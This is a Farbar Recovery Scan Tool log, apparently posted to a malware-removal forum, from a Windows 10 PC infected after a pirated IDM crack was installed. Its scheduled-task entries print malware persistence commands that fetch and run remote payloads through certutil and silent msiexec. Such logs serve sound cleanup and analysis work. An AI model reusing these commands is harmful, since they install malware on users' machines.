2019-02-08 22:55 - 2015-05-29 21:07 - 000778936 _____ (Microsoft Corporation) C:\Windows\SysWOW64\PresentationNative_v0300.dll
2019-02-08 22:55 - 2015-05-29 21:07 - 000102608 _____ (Microsoft Corporation) C:\Windows\SysWOW64\PresentationCFFRasterizerNative_v0300.dll
2019-02-08 22:55 - 2015-05-29 21:07 - 000035480 _____ (Microsoft Corporation) C:\Windows\SysWOW64\TsWpfWrp.exe
2019-02-08 22:46 - 2019-02-08 22:46 - 000000836 __RSH C:\ProgramData\ntuser.pol
2019-02-08 22:28 - 2019-02-09 00:39 - 000000000 ____D C:\Users\Thomazing!\AppData\Roaming\fsmysd5hgd4
2019-02-08 22:22 - 2019-02-09 00:39 - 000000000 ____D C:\Users\Thomazing!\AppData\Roaming\htpaossc1dy
2019-02-08 22:22 - 2019-02-08 22:22 - 006161408 _____ C:\Users\Thomazing!\AppData\Local\dump007.dat
2019-02-08 22:22 - 2019-02-08 22:22 - 000003704 _____ C:\Windows\System32\Tasks\iewiouoxxf
2019-02-08 22:22 - 2019-02-08 22:22 - 000003486 _____ C:\Windows\System32\Tasks\hjuzju
2019-02-08 22:22 - 2019-02-08 22:22 - 000000009 _____ C:\Users\Thomazing!\rstr3.ini
2019-02-08 22:11 - 2019-02-09 01:02 - 000000004 _____ C:\ProgramData\lock.dat
2019-02-08 22:11 - 2019-02-09 00:44 - 000000032 _____ C:\ProgramData\irw.atsd
2019-02-08 22:11 - 2019-02-08 22:11 - 000000008 _____ C:\ProgramData\ts.dat
2019-02-08 22:09 - 2019-02-08 22:09 - 000000000 ____D C:\ProgramData\localNETService
2019-02-08 22:08 - 2019-02-09 00:39 - 000000000 ____D C:\Users\Thomazing!\AppData\Roaming\dwdqael1vpm
2019-02-08 22:03 - 2019-02-08 22:03 - 000004138 _____ C:\Windows\System32\Tasks\User_Feed_Synchronization-{166847B2-00F9-4170-B86A-AB179FF4BAF1}
2019-02-08 22:03 - 2019-02-08 22:03 - 000000000 ____D C:\Users\Thomazing!\AppData\Roaming\Macromedia
2019-02-08 22:00 - 2019-02-08 22:00 - 000004608 _____ C:\Windows\SECOH-QAD.exe
2019-02-08 22:00 - 2019-02-08 22:00 - 000003584 _____ C:\Windows\SECOH-QAD.dll
2019-02-08 21:58 - 2019-02-09 00:42 - 000000000 ____D C:\Users\Thomazing!\AppData\Roaming\DMCache
2019-02-08 21:58 - 2019-02-09 00:39 - 000000000 ____D C:\Users\Thomazing!\AppData\Roaming\p542dcem2lr
2019-02-08 21:58 - 2019-02-08 23:05 - 000000000 ____D C:\Users\Thomazing!\AppData\Roaming\IDM
2019-02-08 21:58 - 2019-02-08 21:58 - 000000000 ____D C:\Users\Thomazing!\Downloads\Video
2019-02-08 21:58 - 2019-02-08 21:58 - 000000000 ____D C:\Users\Thomazing!\Downloads\Compressed
2019-02-08 21:58 - 2019-02-08 21:58 - 000000000 ____D C:\Users\Thomazing!\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Download Manager
2019-02-08 21:58 - 2019-02-08 21:58 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Internet Download Manager
2019-02-08 21:58 - 2019-02-08 21:58 - 000000000 ____D C:\ProgramData\IDM
2019-02-08 21:58 - 2019-02-08 21:58 - 000000000 ____D C:\Program Files (x86)\Internet Download Manager
2019-02-08 21:50 - 2019-02-08 23:06 - 000000000 ____D C:\Windows\SysWOW64\SSL
2019-02-08 21:50 - 2019-02-08 23:01 - 000000000 ____D C:\Users\Thomazing!\AppData\Local\WhiteClick
2019-02-08 21:50 - 2019-02-08 21:50 - 001612288 _____ C:\Windows\bxetfbicyncsflqei.bxetf
2019-02-08 21:49 - 2019-02-08 23:06 - 000000000 ____D C:\ProgramData\boost_interprocess
2019-02-08 21:49 - 2019-02-08 21:52 - 000000000 ____D C:\Users\Thomazing!\AppData\Local\Opera Software
2019-02-08 21:49 - 2019-02-08 21:49 - 000000000 ____D C:\Users\Thomazing!\AppData\Roaming\EpicNet Inc
2019-02-08 21:48 - 2019-02-09 00:39 - 000000000 ____D C:\Users\Thomazing!\AppData\Roaming\la5jchefohd
2019-02-08 21:48 - 2019-02-08 21:48 - 000036096 _____ C:\Windows\system32\Drivers\WinmonProcessMonitor.sys
2019-02-08 21:47 - 2019-02-09 00:39 - 000000000 ____D C:\Users\Thomazing!\AppData\Roaming\znnxx0e21dn
2019-02-08 21:47 - 2019-02-09 00:39 - 000000000 ____D C:\Program Files (x86)\DiskWMpower
2019-02-08 21:47 - 2019-02-08 21:47 - 000003756 _____ C:\Windows\System32\Tasks\{793C8F45-2D37-6E42-38A1-4FC6F516C21B}
2019-02-08 21:47 - 2019-02-08 21:47 - 000003626 _____ C:\Windows\System32\Tasks\{CCA8B79B-43C5-96CB-2514-85E1469B3E7C}
2019-02-08 21:47 - 2019-02-08 21:47 - 000000003 _____ C:\Users\Thomazing!\AppData\Local\wbem.ini
2019-02-08 21:47 - 2019-02-08 21:47 - 000000000 ____D C:\Users\Thomazing!\AppData\Roaming\Mozilla
2019-02-08 21:47 - 2019-02-08 21:47 - 000000000 ____D C:\Program Files (x86)\Multitimer
2019-02-08 21:46 - 2019-02-09 00:43 - 000003612 _____ C:\Windows\System32\Tasks\ScheduledUpdate
2019-02-08 21:46 - 2019-02-09 00:43 - 000003290 _____ C:\Windows\System32\Tasks\csrss
2019-02-08 21:46 - 2019-02-09 00:39 - 000000000 ____D C:\Program Files (x86)\Cta
2019-02-08 21:46 - 2019-02-08 23:16 - 000000000 ____D C:\Program Files (x86)\0qfoy55me3i
2019-02-08 21:46 - 2019-02-08 21:48 - 008019296 _____ (Microsoft Corporation) C:\Windows\system32\ntkrnlmp.exe
2019-02-08 21:46 - 2019-02-08 21:48 - 001123400 _____ (Microsoft Corporation) C:\Windows\system32\osloader.exe
2019-02-08 21:46 - 2019-02-08 21:46 - 001895384 _____ C:\Users\Thomazing!\AppData\Local\Namfresh.bin
2019-02-08 21:46 - 2019-02-08 21:46 - 000621928 _____ (VxDriver) C:\Windows\B62CD2D3FFB1.sys
2019-02-08 21:46 - 2019-02-08 21:46 - 000015602 _____ C:\Windows\SysWOW64\findit.xml
2019-02-08 21:46 - 2019-02-08 21:46 - 000000000 ____D C:\Users\Thomazing!\AppData\Roaming\Opera Software
2019-02-08 21:46 - 2019-02-08 21:46 - 000000000 ____D C:\ProgramData\Polygens
2019-02-08 21:46 - 2019-02-08 21:46 - 000000000 ____D C:\ProgramData\Logic Cramble
2019-02-08 21:45 - 2019-02-08 23:05 - 000000000 ____D C:\Users\Thomazing!\AppData\Roaming\uTorrent
2019-02-08 21:45 - 2019-02-08 21:52 - 000722944 _____ C:\Users\Thomazing!\AppData\Local\sham.db
2019-02-08 21:45 - 2019-02-08 21:45 - 007881728 _____ C:\Users\Thomazing!\AppData\Local\agent.dat
2019-02-08 21:45 - 2019-02-08 21:45 - 002038046 _____ C:\Users\Thomazing!\AppData\Local\Silsoning.tst
2019-02-08 21:45 - 2019-02-08 21:45 - 001632256 _____ (TODO: <Company name>) C:\Users\Thomazing!\AppData\Local\Silsoning.exe
2019-02-08 21:45 - 2019-02-08 21:45 - 001632256 _____ (TODO: <Company name>) C:\Users\Thomazing!\AppData\Local\Joybam.exe
2019-02-08 21:45 - 2019-02-08 21:45 - 001246160 _____ (Mozilla Foundation) C:\ProgramData\nss3.dll
2019-02-08 21:45 - 2019-02-08 21:45 - 000440120 _____ (Microsoft Corporation) C:\ProgramData\msvcp140.dll
2019-02-08 21:45 - 2019-02-08 21:45 - 000278510 _____ C:\Users\Thomazing!\AppData\Local\Joybam.tst
2019-02-08 21:45 - 2019-02-08 21:45 - 000140800 _____ C:\Users\Thomazing!\AppData\Local\installer.dat
2019-02-08 21:45 - 2019-02-08 21:45 - 000137168 _____ (Mozilla Foundation) C:\ProgramData\mozglue.dll
2019-02-08 21:45 - 2019-02-08 21:45 - 000126464 _____ C:\Users\Thomazing!\AppData\Local\noah.dat
2019-02-08 21:45 - 2019-02-08 21:45 - 000083784 _____ (Microsoft Corporation) C:\ProgramData\vcruntime140.dll
2019-02-08 21:45 - 2019-02-08 21:45 - 000070896 _____ C:\Users\Thomazing!\AppData\Local\Config.xml
2019-02-08 21:45 - 2019-02-08 21:45 - 000053888 _____ (TOSHIBA Corporation) C:\Windows\system32\Drivers\TVALZ_O.SYS
2019-02-08 21:45 - 2019-02-08 21:45 - 000045720 _____ (Toshiba Corporation) C:\Windows\system32\Drivers\Thotkey.sys
2019-02-08 21:45 - 2019-02-08 21:45 - 000044208 _____ (TOSHIBA Corporation) C:\Windows\system32\Drivers\tosrfec.sys
2019-02-08 21:45 - 2019-02-08 21:45 - 000035584 _____ (Western Digital Technologies, Inc.) C:\Windows\system32\Drivers\wdcsam64.sys
2019-02-08 21:45 - 2019-02-08 21:45 - 000018432 _____ C:\Users\Thomazing!\AppData\Local\Main.dat
2019-02-08 21:45 - 2019-02-08 21:45 - 000017920 _____ (TOSHIBA Corporation) C:\Windows\system32\Drivers\FwLnk.sys
2019-02-08 21:45 - 2019-02-08 21:45 - 000016368 _____ C:\Users\Thomazing!\AppData\Local\InstallationConfiguration.xml
2019-02-08 21:45 - 2019-02-08 21:45 - 000005568 _____ C:\Users\Thomazing!\AppData\Local\md.xml
2019-02-08 21:45 - 2019-02-08 21:45 - 000003088 _____ C:\Windows\System32\Tasks\Synaptics TouchPad Enhancements
2019-02-08 21:45 - 2019-02-08 21:45 - 000000881 _____ C:\Users\Thomazing!\AppData\Roaming\Microsoft\Windows\Start Menu\µTorrent.lnk
2019-02-08 21:45 - 2019-02-08 21:45 - 000000000 ____H C:\Windows\system32\Drivers\Msft_Kernel_SynTP_01011.Wdf
2019-02-08 21:45 - 2019-02-08 21:45 - 000000000 ____D C:\Program Files\Synaptics
2019-02-08 21:45 - 2019-02-08 21:45 - 000000000 ____D C:\Program Files (x86)\foldershare
2019-02-08 21:44 - 2019-02-08 21:45 - 000000000 ____D C:\ProgramData\VMR6PC5JA6GYC9V0XH3B
2019-02-08 21:44 - 2019-02-08 21:44 - 001795952 _____ (Microsoft Corporation) C:\Windows\system32\WdfCoInstaller01011.dll
2019-02-08 21:44 - 2019-02-08 21:44 - 000722672 _____ (Synaptics Incorporated) C:\Windows\system32\SynCOM.dll
2019-02-08 21:44 - 2019-02-08 21:44 - 000528112 _____ (Synaptics Incorporated) C:\Windows\system32\Drivers\SynTP.sys
2019-02-08 21:44 - 2019-02-08 21:44 - 000422128 _____ (Synaptics Incorporated) C:\Windows\system32\SynTPCo19.dll
2019-02-08 21:44 - 2019-02-08 21:44 - 000400112 _____ (Synaptics Incorporated) C:\Windows\SysWOW64\SynCom.dll
2019-02-08 21:44 - 2019-02-08 21:44 - 000251632 _____ (Synaptics Incorporated) C:\Windows\system32\SynTPAPI.dll
2019-02-08 21:44 - 2019-02-08 21:44 - 000169712 _____ (Synaptics Incorporated) C:\Windows\SysWOW64\SynTPCom.dll
2019-02-08 21:42 - 2019-02-08 21:42 - 000000000 ____D C:\Users\Thomazing!\AppData\Roaming\WinRAR
2019-02-08 21:42 - 2019-02-08 21:42 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\VideoLAN
2019-02-08 21:41 - 2019-02-08 21:41 - 003141232 _____ (Alexander Roshal) C:\Users\Thomazing!\Downloads\winrar-x64-57b1.exe
2019-02-08 21:41 - 2019-02-08 21:41 - 000000000 ____D C:\Program Files\WinRAR
2019-02-08 21:41 - 2019-02-08 21:41 - 000000000 ____D C:\Program Files\VideoLAN
2019-02-08 21:37 - 2019-02-08 21:37 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office
2019-02-08 21:35 - 2019-02-08 21:35 - 010627744 _____ (Intel Corporation) C:\Windows\system32\Drivers\igdkmd64.sys
2019-02-08 21:35 - 2019-02-08 21:35 - 006593816 _____ (Intel Corporation) C:\Windows\system32\igdumd64.dll
2019-02-08 21:35 - 2019-02-08 21:35 - 004931384 _____ (Intel Corporation) C:\Windows\SysWOW64\igdumd32.dll
2019-02-08 21:35 - 2019-02-08 21:35 - 004755784 _____ (Intel Corporation) C:\Windows\system32\igd10umd64.dll
2019-02-08 21:35 - 2019-02-08 21:35 - 004370016 _____ (Intel Corporation) C:\Windows\SysWOW64\igd10umd32.dll
2019-02-08 21:35 - 2019-02-08 21:35 - 001991936 _____ C:\Windows\system32\iglhxa64.cpa
2019-02-08 21:35 - 2019-02-08 21:35 - 000982240 _____ C:\Windows\SysWOW64\igkrng500.bin
2019-02-08 21:35 - 2019-02-08 21:35 - 000982240 _____ C:\Windows\system32\igkrng500.bin
2019-02-08 21:35 - 2019-02-08 21:35 - 000439308 _____ C:\Windows\SysWOW64\igcompkrng500.bin
2019-02-08 21:35 - 2019-02-08 21:35 - 000439308 _____ C:\Windows\system32\igcompkrng500.bin
2019-02-08 21:35 - 2019-02-08 21:35 - 000208896 _____ (Intel Corporation) C:\Windows\SysWOW64\iglhsip32.dll
2019-02-08 21:35 - 2019-02-08 21:35 - 000206336 _____ (Intel Corporation) C:\Windows\system32\iglhsip64.dll
2019-02-08 21:35 - 2019-02-08 21:35 - 000188416 _____ (Intel Corporation) C:\Windows\system32\iglhcp64.dll
2019-02-08 21:35 - 2019-02-08 21:35 - 000147456 _____ (Intel Corporation) C:\Windows\SysWOW64\iglhcp32.dll
2019-02-08 21:35 - 2019-02-08 21:35 - 000092356 _____ C:\Windows\SysWOW64\igfcg500m.bin
2019-02-08 21:35 - 2019-02-08 21:35 - 000092356 _____ C:\Windows\system32\igfcg500m.bin
2019-02-08 21:35 - 2019-02-08 21:35 - 000060254 _____ C:\Windows\system32\iglhxg64.vp
2019-02-08 21:35 - 2019-02-08 21:35 - 000060226 _____ C:\Windows\system32\iglhxc64.vp
2019-02-08 21:35 - 2019-02-08 21:35 - 000060015 _____ C:\Windows\system32\iglhxo64.vp
2019-02-08 21:35 - 2019-02-08 21:35 - 000005424 _____ C:\Windows\system32\iglhxs64.vp
2019-02-08 21:35 - 2019-02-08 21:35 - 000001090 _____ C:\Windows\system32\iglhxa64.vp
2019-02-08 21:35 - 2019-02-08 21:35 - 000000000 ____D C:\Windows\PCHEALTH
2019-02-08 21:34 - 2019-02-08 21:34 - 000000000 ____D C:\Windows\System32\Tasks\OfficeSoftwareProtectionPlatform
2019-02-08 21:33 - 2019-02-08 21:45 - 000000000 ____D C:\Program Files\Microsoft Office
2019-02-08 21:33 - 2019-02-08 21:35 - 000000000 ____D C:\Program Files (x86)\Microsoft Office
2019-02-08 21:33 - 2019-02-08 21:33 - 000000000 __RHD C:\MSOCache
2019-02-08 21:33 - 2019-02-08 21:33 - 000000000 ____D C:\Users\Thomazing!\AppData\Local\Microsoft Help
2019-02-08 21:33 - 2019-02-08 21:33 - 000000000 ____D C:\Program Files (x86)\Microsoft Analysis Services
2019-02-08 21:26 - 2019-02-08 23:17 - 000000000 ____D C:\Users\Thomazing!\AppData\Local\Google
2019-02-08 21:26 - 2019-02-08 23:02 - 000000000 ____D C:\Program Files (x86)\Google
2019-02-08 21:26 - 2019-02-08 21:26 - 001136176 _____ (Google Inc.) C:\Users\Thomazing!\Downloads\ChromeSetup.exe
2019-02-08 21:24 - 2019-02-08 21:24 - 000000000 ____D C:\Users\Thomazing!\AppData\Local\MicrosoftEdge
2019-02-07 17:10 - 2019-02-07 17:10 - 000098203 _____ C:\Windows\uninstaller.dat
==================== One month (modified) ========
(If an entry is included in the fixlist, the file/folder will be moved.)
2019-02-09 13:19 - 2015-07-31 06:42 - 000000000 ____D C:\Windows\rescache
2019-02-09 13:16 - 2015-07-10 17:47 - 000000000 ____D C:\Windows\system32\Sysprep
2019-02-09 13:14 - 2015-07-31 06:42 - 000028672 _____ C:\Windows\system32\config\BCD-Template
2019-02-09 00:52 - 2015-07-31 06:40 - 000000000 ____D C:\Windows\INF
2019-02-09 00:43 - 2015-07-31 05:52 - 000000006 ____H C:\Windows\Tasks\SA.DAT
2019-02-09 00:42 - 2015-07-10 17:05 - 000131072 ___SH C:\Windows\system32\config\BBI
2019-02-08 23:59 - 2015-09-10 13:44 - 000000000 __RHD C:\Users\Public\AccountPictures
2019-02-08 22:56 - 2015-07-31 06:25 - 000000000 ____D C:\Windows\CbsTemp
2019-02-08 22:45 - 2015-07-31 06:42 - 000000000 ___HD C:\Windows\system32\GroupPolicy
2019-02-08 22:08 - 2015-07-31 05:49 - 000277768 _____ C:\Windows\system32\FNTCACHE.DAT
2019-02-08 21:46 - 2015-07-31 06:42 - 000000000 ____D C:\Windows\AppReadiness
2019-02-08 21:39 - 2015-07-31 06:42 - 000000000 ___HD C:\Program Files\WindowsApps
2019-02-08 21:34 - 2015-07-31 06:42 - 000000000 ____D C:\Program Files\Common Files\microsoft shared
2019-02-08 21:33 - 2015-09-10 13:21 - 000000000 ____D C:\Windows\ShellNew
==================== Files in the root of some directories =======
2019-02-08 22:11 - 2019-02-09 01:02 - 000000004 _____ () C:\ProgramData\lock.dat
2019-02-08 21:45 - 2019-02-08 21:45 - 000137168 _____ (Mozilla Foundation) C:\ProgramData\mozglue.dll
2019-02-08 21:45 - 2019-02-08 21:45 - 000440120 _____ (Microsoft Corporation) C:\ProgramData\msvcp140.dll
2019-02-08 21:45 - 2019-02-08 21:45 - 001246160 _____ (Mozilla Foundation) C:\ProgramData\nss3.dll
2019-02-08 22:11 - 2019-02-08 22:11 - 000000008 _____ () C:\ProgramData\ts.dat
2019-02-08 21:45 - 2019-02-08 21:45 - 000083784 _____ (Microsoft Corporation) C:\ProgramData\vcruntime140.dll
1601-01-03 21:26 - 1601-01-03 21:26 - 000058368 ____N (Microsoft Corporation) C:\Program Files (x86)\iUOI.exe
1601-01-03 21:26 - 1601-01-03 21:26 - 000180736 ____N (Microsoft Corporation) C:\Program Files (x86)\OKseaoP.exe
2019-02-08 21:45 - 2019-02-08 21:45 - 007881728 _____ () C:\Users\Thomazing!\AppData\Local\agent.dat
2019-02-08 21:45 - 2019-02-08 21:45 - 000070896 _____ () C:\Users\Thomazing!\AppData\Local\Config.xml
2019-02-08 22:22 - 2019-02-08 22:22 - 006161408 _____ () C:\Users\Thomazing!\AppData\Local\dump007.dat
2019-02-08 21:45 - 2019-02-08 21:45 - 000016368 _____ () C:\Users\Thomazing!\AppData\Local\InstallationConfiguration.xml
2019-02-08 21:45 - 2019-02-08 21:45 - 000140800 _____ () C:\Users\Thomazing!\AppData\Local\installer.dat
1601-01-03 21:26 - 1601-01-03 21:26 - 000058368 ____N (Microsoft Corporation) C:\Users\Thomazing!\AppData\Local\IOIiIOa.exe
2019-02-08 21:45 - 2019-02-08 21:45 - 001632256 _____ (TODO: <Company name>) C:\Users\Thomazing!\AppData\Local\Joybam.exe
2019-02-08 21:45 - 2019-02-08 21:45 - 000278510 _____ () C:\Users\Thomazing!\AppData\Local\Joybam.tst
2019-02-08 21:45 - 2019-02-08 21:45 - 000018432 _____ () C:\Users\Thomazing!\AppData\Local\Main.dat
2019-02-08 21:45 - 2019-02-08 21:45 - 000005568 _____ () C:\Users\Thomazing!\AppData\Local\md.xml
2019-02-08 21:46 - 2019-02-08 21:46 - 001895384 _____ () C:\Users\Thomazing!\AppData\Local\Namfresh.bin
2019-02-08 21:45 - 2019-02-08 21:45 - 000126464 _____ () C:\Users\Thomazing!\AppData\Local\noah.dat
2019-02-08 21:45 - 2019-02-08 21:52 - 000722944 _____ () C:\Users\Thomazing!\AppData\Local\sham.db
2019-02-08 21:45 - 2019-02-08 21:45 - 001632256 _____ (TODO: <Company name>) C:\Users\Thomazing!\AppData\Local\Silsoning.exe
2019-02-08 21:45 - 2019-02-08 21:45 - 002038046 _____ () C:\Users\Thomazing!\AppData\Local\Silsoning.tst
2019-02-08 21:46 - 2019-02-08 21:46 - 000032038 _____ () C:\Users\Thomazing!\AppData\Local\uninstall_temp.ico
2019-02-08 21:47 - 2019-02-08 21:47 - 000000003 _____ () C:\Users\Thomazing!\AppData\Local\wbem.ini
Files to move or delete:
====================
C:\Program Files (x86)\Multitimer\Multitimer.exe
C:\Program Files (x86)\0qfoy55me3i\ESDJ37B9ITN0QK9.exe
C:\Users\Thomazing!\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe
Some files in TEMP:
====================
2019-02-08 21:46 - 2019-02-08 21:46 - 001527488 _____ (Microsoft Corporation) C:\Users\Thomazing!\AppData\Local\Temp\dbghelp.dll
2019-02-08 21:44 - 2019-02-08 21:47 - 025260414 _____ (TigerTrade ) C:\Users\Thomazing!\AppData\Local\Temp\ezdyyd.exe
2019-02-08 21:45 - 2019-02-08 21:46 - 000672090 _____ (FAZ ) C:\Users\Thomazing!\AppData\Local\Temp\global_installer.exe
2019-02-08 21:44 - 2019-02-08 21:55 - 002892544 _____ (BitTorrent Inc.) C:\Users\Thomazing!\AppData\Local\Temp\IDM_Serial_Number_Crack_Patch_Free_2019_Serial_Keys.exe
2019-02-08 22:22 - 2019-02-09 00:31 - 000000000 ____D () C:\Users\Thomazing!\AppData\Local\Temp\ImagingEngine.dll
2019-02-08 21:46 - 2019-02-08 21:46 - 001385984 _____ (wj32) C:\Users\Thomazing!\AppData\Local\Temp\installer_mi.exe
2019-02-08 21:46 - 2019-02-08 21:48 - 001905784 _____ (Google Inc.) C:\Users\Thomazing!\AppData\Local\Temp\mcasin.exe
2019-02-08 21:46 - 2019-02-08 21:46 - 000375522 _____ ( ) C:\Users\Thomazing!\AppData\Local\Temp\ncyvgt4vxoc.exe
2019-02-08 21:46 - 2019-02-08 21:46 - 000167616 _____ (Microsoft Corporation) C:\Users\Thomazing!\AppData\Local\Temp\symsrv.dll
2019-02-08 21:51 - 2019-02-08 21:47 - 000099906 _____ () C:\Users\Thomazing!\AppData\Local\Temp\Uninstall.exe
2019-02-08 21:44 - 2019-02-08 21:45 - 004500992 _____ () C:\Users\Thomazing!\AppData\Local\Temp\xtex.exe
==================== Bamital & volsnap ======================
(There is no automatic fix for files that do not pass verification.)
C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\dnsapi.dll => File is digitally signed
C:\Windows\SysWOW64\dnsapi.dll => File is digitally signed
C:\Windows\system32\dllhost.exe => File is digitally signed
C:\Windows\SysWOW64\dllhost.exe => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed
BCD (recoveryenabled=No -> recoveryenabled=Yes) <==== restored successfully
LastRegBack: 2019-02-09 13:15
==================== End of FRST.txt ============================
-
February 8th, 2019, 01:14 PM
#2
ADDITION
Additional scan result of Farbar Recovery Scan Tool (x64) Version: 6.02.2019
Ran by Thomazing! (09-02-2019 01:03:19)
Running from C:\Users\Thomazing!\Downloads
Windows 10 Pro 10240.16487 (X64) (2019-02-09 05:18:42)
Boot Mode: Normal
==========================================================
==================== Accounts: =============================
Administrator (S-1-5-21-3408261874-2140888000-2142219774-500 - Administrator - Disabled)
DefaultAccount (S-1-5-21-3408261874-2140888000-2142219774-503 - Limited - Disabled)
Guest (S-1-5-21-3408261874-2140888000-2142219774-501 - Limited - Disabled)
Thomazing! (S-1-5-21-3408261874-2140888000-2142219774-1001 - Administrator - Enabled) => C:\Users\Thomazing!
==================== Security Center ========================
(If an entry is included in the fixlist, it will be removed.)
AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
==================== Installed Programs ======================
(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
µTorrent (HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\...\uTorrent) (Version: 3.5.5.44994 - BitTorrent Inc.)
Alien Team (HKLM-x32\...\{52811919-39BB-4C90-95A6-323FA6636B29}_is1) (Version: 1 - Alien Team)
CCleaner (HKLM\...\CCleaner) (Version: 5.52 - Piriform)
CloudNet (HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\...\CloudNet) (Version: 20170301 - EpicNet Inc.) <==== ATTENTION
DiskWMpower version 1.0 (HKLM-x32\...\DiskWMpower_is1) (Version: 1.0 - WeMonetize) <==== ATTENTION
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 72.0.3626.96 - Google Inc.)
Google Toolbar for Internet Explorer (HKLM-x32\...\{18455581-E099-4BA8-BC6B-F34B2F06600C}) (Version: 1.0.0 - Google Inc.) Hidden
Google Toolbar for Internet Explorer (HKLM-x32\...\{2318C2B1-4965-11d4-9B18-009027A5CD4F}) (Version: 7.5.8231.2252 - Google Inc.)
Google Update Helper (HKLM-x32\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.33.23 - Google Inc.) Hidden
IDM Crack 6.25 build 20 (HKLM-x32\...\IDM Crack 6.25 build 20) (Version: build 21 - Crackingpatching.com Team)
Internet Download Manager (HKLM-x32\...\Internet Download Manager) (Version: - Tonec Inc.)
Microsoft Office Professional Plus 2010 (HKLM-x32\...\Office14.PROPLUSR) (Version: 14.0.4763.1000 - Microsoft Corporation)
Multitimer version 1.0 (HKLM-x32\...\Multitimer_is1) (Version: 1.0 - ) <==== ATTENTION
Synaptics Pointing Device Driver (HKLM\...\SynTPDeinstKey) (Version: 17.0.10.51 - Synaptics Incorporated)
TotalAV (HKLM-x32\...\TotalAV) (Version: 4.10.38 - TotalAV)
VLC media player (HKLM\...\VLC media player) (Version: 3.0.6 - VideoLAN)
WinRAR 5.70 beta 1 (64-bit) (HKLM\...\WinRAR archiver) (Version: 5.70.1 - win.rar GmbH)
==================== Custom CLSID (Whitelisted): ==========================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
ShellIconOverlayIdentifiers: [ IDM Shell Extension] -> {CDC95B92-E27C-4745-A8C5-64A52A78855D} => C:\Program Files (x86)\Internet Download Manager\IDMShellExt64.dll [2015-08-14] (Tonec Inc. -> Tonec Inc.)
ContextMenuHandlers1: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2019-01-28] (win.rar GmbH -> Alexander Roshal)
ContextMenuHandlers1-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2019-01-28] (win.rar GmbH -> Alexander Roshal)
ContextMenuHandlers6: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2019-01-28] (win.rar GmbH -> Alexander Roshal)
ContextMenuHandlers6-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2019-01-28] (win.rar GmbH -> Alexander Roshal)
==================== Scheduled Tasks (Whitelisted) =============
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
Task: {25681BAB-9719-40FC-87F6-A290829EB501} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2019-01-10] (Piriform Software Ltd -> Piriform Software Ltd)
Task: {34F52A04-A693-4743-95C8-BD2D08D5B443} - System32\Tasks\csrss => C:\Windows\rss\csrss.exe [2019-02-08] () [File not signed] <==== ATTENTION
Task: {38519D9A-952D-4D91-9C1A-8C4F1933B519} - System32\Tasks\iewiouoxxf => "msiexec" /q -package hxxps://superdomain1709.info/qolsfioklpiu.huu
Task: {43DBA25B-CE5F-49A9-898C-47539A2F79EE} - System32\Tasks\ScheduledUpdate => cmd.exe /C certutil.exe -urlcache -split -f hxxp://krokas.info/app/app.exe C:\Users\Thomazing!\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Thomazing!\AppData\Local\Temp\csrss\scheduled.exe /31340 <==== ATTENTION
Task: {71E02E5A-83AD-4151-B826-04CEFE0C7B32} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2019-02-08] (Google Inc -> Google Inc.)
Task: {9711D794-1AC7-4767-9653-E265DA25924D} - System32\Tasks\{CCA8B79B-43C5-96CB-2514-85E1469B3E7C} => C:\Users\Thomazing!\AppData\Local\IOIiIOa.exe [1601-01-03] (Microsoft Windows -> Microsoft Corporation) <==== ATTENTION
Task: {9EF0F8A1-4CFA-45BB-8959-8C5455003D37} - System32\Tasks\Synaptics TouchPad Enhancements => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [2019-02-08] (Synaptics Incorporated -> Synaptics Incorporated)
Task: {A2AB8BC7-BF40-4EB1-BCF0-454B8BFC22A2} - System32\Tasks\{793C8F45-2D37-6E42-38A1-4FC6F516C21B} => "msiexec.exe" -q -i hxxps://refreshnerer711.info/vDgBc3c79u8.s27
Task: {CE636CD2-BC9F-45B0-86B6-6533DEC76BA4} - System32\Tasks\hjuzju => "msiexec" -package hxxps://superdomain1709.info/hawbncj.mri /q
Task: {E311046B-4383-410D-B613-3788683CA329} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2019-02-08] (Google Inc -> Google Inc.)
